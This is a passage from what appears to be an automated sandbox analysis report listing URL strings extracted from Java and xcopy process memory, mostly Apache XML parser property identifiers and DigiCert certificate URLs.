Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryes/i:
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scannerP
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scannerypeDef7
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processort5
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerdAt8
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver6
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-bindery
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context:
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolverti=
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerF
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerdProF
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory7
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factorynt7
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd:
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/schemarocess
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler9
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/ion
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/locale
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/localeJ
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationonditi?
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationK
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationaK
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager8
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declaration
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationl
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationtack
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitiont(
Source: javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: java.exe, 00000002.00000002.1638031502.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FA7000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009F78000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A579000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
